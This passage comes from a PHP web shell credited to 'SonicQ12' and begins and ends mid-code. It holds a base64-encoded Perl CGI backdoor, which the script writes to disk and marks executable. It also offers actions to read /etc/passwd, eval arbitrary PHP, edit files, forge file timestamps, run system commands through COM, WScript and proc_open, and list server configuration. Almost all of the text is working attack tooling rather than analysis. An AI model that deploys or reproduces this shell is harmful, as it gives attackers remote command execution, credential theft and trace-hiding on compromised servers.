lZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQpFTkQKCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJCWV4aXQ7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBleGVjdXRlIGNvbW1hbmRzLiBJdCBkaXNwbGF5cyB0aGUgb3V0cHV0IG9mIHRoZQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5CiMgY29tbWFuZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5IGlzIHN0b3JlZCBpbgojIGFuIGludGVybmFsIHZhcmlhYmxlIGFuZCBpcyB1c2VkIGVhY2ggdGltZSBhIGNvbW1hbmQgaGFzIHRvIGJlIGV4ZWN1dGVkLiBUaGUKIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2VycwojIHRoZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBFeGVjdXRlQ29tbWFuZAp7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsKCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7CgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7CgkJcHJpbnQgIiRQcm9tcHQgJFJ1bkNvbW1hbmQiOwoJfQoJZWxzZSAjIHNvbWUgb3RoZXIgY29tbWFuZCwgZGlzcGxheSB0aGUgb3V0cHV0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOwoJCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJCXByaW50ICIkUHJvbXB0ICRSdW5Db21tYW5kPHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgoKU2VuZGluZyBGaWxlICRUcmFuc2ZlckZpbGUuLi48YnI+CklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPi4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBmaWxlIGRvZXNuJ3QgZXhpc3QKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gcmVhZHMgdGhlIHNwZWNpZmllZCBmaWxlIGZyb20gdGhlIGRpc2sgYW5kIHNlbmRzIGl0IHRvIHRoZQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2FuIGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIHNlbnQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyCnsKCWxvY2FsKCRTZW5kRmlsZSkgPSBAXzsKCWlmKG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcKCXsKCQlpZigkV2luTlQpCgkJewoJCQliaW5tb2RlKFNFTkRGSUxFKTsKCQkJYmlubW9kZShTVERPVVQpOwoJCX0KCQkkRmlsZVNpemUgPSAoc3RhdCgkU2VuZEZpbGUpKVs3XTsKCQkoJEZpbGVuYW1lID0gJFNlbmRGaWxlKSA9fiAgbSEoW14vXlxcXSopJCE7CgkJcHJpbnQgIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOwoJCXByaW50ICJDb250ZW50LUxlbmd0aDogJEZpbGVTaXplXG4iOwoJCXByaW50ICJDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kMVxuXG4iOwoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOwoJCWNsb3NlKFNFTkRGSUxFKTsKCX0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAkISI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQojIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsgdGhyb3VnaCB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIyBUaGlzIGZ1bmN0aW9uIGlzIGFsc28gY2FsbGVkIHdoZW4gdGhlIHVzZXIgY2xpY2tzIG9uIHRoYXQgbGluay4gSW4gdGhpcyBjYXNlLAojIHRoZSBmaWxlIGlzIHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJlZ2luRG93bmxvYWQKewoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZAoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8CgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOwoJfQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UKCXsKCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IHN0YXJ0cyB0aGUgdXBsb2FkIHByb2Nlc3MuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFVwbG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlVXBsb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJCXJldHVybjsKCX0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJcHJpbnQgIlVwbG9hZGluZyAkVHJhbnNmZXJGaWxlIHRvICRDdXJyZW50RGlyLi4uPGJyPiI7CgoJIyBnZXQgdGhlIGZ1bGxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgY3JlYXRlZAoJY2hvcCgkVGFyZ2V0TmFtZSkgaWYgKCRUYXJnZXROYW1lID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkkVHJhbnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOwoJJFRhcmdldE5hbWUgLj0gJFBhdGhTZXAuJDE7CgoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7CgkjIGlmIHRoZSBmaWxlIGV4aXN0cyBhbmQgd2UgYXJlIG5vdCBzdXBwb3NlZCB0byBvdmVyd3JpdGUgaXQKCWlmKC1lICRUYXJnZXROYW1lICYmICRPcHRpb25zIG5lICJvdmVyd3JpdGUiKQoJewoJCXByaW50ICJGYWlsZWQ6IERlc3RpbmF0aW9uIGZpbGUgYWxyZWFkeSBleGlzdHMuPGJyPiI7Cgl9CgllbHNlICMgZmlsZSBpcyBub3QgcHJlc2VudAoJewoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQoJCXsKCQkJYmlubW9kZShVUExPQURGSUxFKSBpZiAkV2luTlQ7CgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9OwoJCQljbG9zZShVUExPQURGSUxFKTsKCQkJcHJpbnQgIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQlwcmludCAiRmlsZSBQYXRoOiAkVGFyZ2V0TmFtZTxicj4iOwoJCX0KCQllbHNlCgkJewoJCQlwcmludCAiRmFpbGVkOiAkITxicj4iOwoJCX0KCX0KCXByaW50ICIiOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgoJJlByaW50UGFnZUZvb3RlcjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rCiMgdGhyb3VnaCAgd2hpY2ggdGhlIGZpbGUgY2FuIGJlIGRvd25sb2FkZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIERvd25sb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2FpbgoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJCXJldHVybjsKCX0KCQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZAoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8CgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOwoJfQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UKCXsKCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CgokQWN0aW9uID0gJGlueydhJ307CiRBY3Rpb24gPSAibG9naW4iIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0CgojIGdldCB0aGUgZGlyZWN0b3J5IGluIHdoaWNoIHRoZSBjb21tYW5kcyB3aWxsIGJlIGV4ZWN1dGVkCiRDdXJyZW50RGlyID0gJGlueydkJ307CmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsKCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsKCmlmKCRBY3Rpb24gZXEgImxvZ2luIiB8fCAhJExvZ2dlZEluKSAjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMgdG8gcnVuIGEgY29tbWFuZAp7CgkmRXhlY3V0ZUNvbW1hbmQ7Cn0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUKewoJJlVwbG9hZEZpbGU7Cn0KZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAjIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlCnsKCSZEb3dubG9hZEZpbGU7Cn0KZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dAp7CgkmUGVyZm9ybUxvZ291dDsKfQ=='; $cgi_file = 'izo.sonicq12'; $create_cgi = fopen($cgi_file, 'w+'); fwrite($create_cgi,base64_decode($cgi_code)); fclose($create_cgi); chmod($cgi_file, 0755); echo '
Open .Htaccess
'; echo 'Open Open CGI '; } elseif ($action == 'etcpwd') { formhead(array('title'=>'Get /etc/passwd')); makehide('action','etcpwd'); makehide('dir',$nowpath); $i = 0; echo "


"; formfoot(); } elseif ($action == 'eval') { $phpcode = trim($phpcode); if($phpcode){ if (!preg_match('#<\?#si', $phpcode)) { $phpcode = ""; } eval("?".">$phpcode'Eval PHP Code')); makehide('action','eval'); maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); formfooter(); } elseif ($action == 'editfile') { if(file_exists($opfile)) { $fp=@fopen($opfile,'r'); $contents=@fread($fp, filesize($opfile)); @fclose($fp); $contents=htmlspecialchars($contents); } formhead(array('title'=>'Create / Edit File')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); formfooter(); } elseif ($action == 'newtime') { $opfilemtime = @filemtime($opfile); $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); formhead(array('title'=>'Clone file was last modified time')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); formfooter(); formhead(array('title'=>'Set last modified')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); p('

Instead »'); p('year:'); makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); p('month:'); makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); p('day:'); makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); p('hour:'); makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); p('minute:'); makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); p('second:'); makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); p('

'); formfooter(); } elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if($program && $parameter) { $shell= new COM('Shell.Application'); $a = $shell->ShellExecute($program,$parameter); m('Program run has '.(!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; formhead(array('title'=>'Execute Program')); makehide('action','shell'); makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); p('

'); makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); } formhead(array('title'=>'Execute Command')); makehide('action','shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); } p('

'); makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); if ($command) { p('
');

            if ($execfunc=='wscript' && IS_WIN && IS_COM) {

                $wsh = new COM('WScript.shell');

                $exec = $wsh->exec('cmd.exe /c '.$command);

                $stdout = $exec->StdOut();

                $stroutput = $stdout->ReadAll();

                echo $stroutput;

            } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {

                $descriptorspec = array(

                    0 => array('pipe', 'r'),

                    1 => array('pipe', 'w'),

                    2 => array('pipe', 'w')

                );

                $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);

                if (is_resource($process)) {

                    fwrite($pipes[0], $command."\r\n");

                    fwrite($pipes[0], "exit\r\n");

                    fclose($pipes[0]);

                    while (!feof($pipes[1])) {

                        echo fgets($pipes[1], 1024);

                    }

                    fclose($pipes[1]);

                    while (!feof($pipes[2])) {

                        echo fgets($pipes[2], 1024);

                    }

                    fclose($pipes[2]);

                    proc_close($process);

                }

            } else {

                echo(execute($command));

            }

            p('
'); } } elseif ($action == 'phpenv') { $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array( 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), 2 => array('Server Domain',$_SERVER['SERVER_NAME']), 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS',PHP_OS), 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), 8 => array('PHP run mode',strtoupper(php_sapi_name())), 9 => array('The file path',__FILE__), 10 => array('PHP Version',PHP_VERSION), 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), 12 => array('Safe Mode',getcfg('safe_mode')), 13 => array('Administrator',$adminmail), 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), 15 => array('enable_dl',getcfg('enable_dl')), 16 => array('display_errors',getcfg('display_errors')), 17 => array('register_globals',getcfg('register_globals')), 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), 19 => array('memory_limit',getcfg('memory_limit')), 20 => array('post_max_size',getcfg('post_max_size')), 21 => array('upload_max_filesize',$upsize), 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), 23 => array('disable_functions',$dis_func), ); if($phpvarname) { m($phpvarname .' : '.getcfg($phpvarname)); } formhead(array('title'=>'Server environment')); makehide('action','phpenv'); makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); formfooter(); $hp = array(0=> 'Server', 1=> 'PHP'); for($a=0;$a<2;$a++) { p('

'.$hp[$a].' »

'); p(''); } } else { m('Undefined Action'); } ?>
Copyright (C) 2013/2014 Developed by SonicQ12
'; echo $msg; echo '
'; } function scookie($key, $value, $life = 0, $prefix = 1) { //global $admin, $timestamp, $_SERVER; //$key = ($prefix ? $admin['cookiepre'] : '').$key; //$life = $life ? $life : $admin['cookielife']; //$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; $_SESSION[$key] = $value; //setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport); } function multi($num, $perpage, $curpage, $tablename) { $multipage = ''; if($num > $perpage) { $page = 10; $offset = 5; $pages = @ceil($num / $perpage); if($page > $pages) { $from = 1; $to = $pages; } else { $from = $curpage - $offset; $to = $curpage + $page - $offset - 1; if($from < 1) { $to = $curpage + 1 - $from; $from = 1; if(($to - $from) < $page && ($to - $from) < $pages) { $to = $page; } } elseif($to > $pages) { $from = $curpage - $pages + $to; $to = $pages; if(($to - $from) < $page && ($to - $from) < $pages) { $from = $pages - $page + 1; } } } $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); for($i = $from; $i <= $to; $i++) { $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; } $multipage 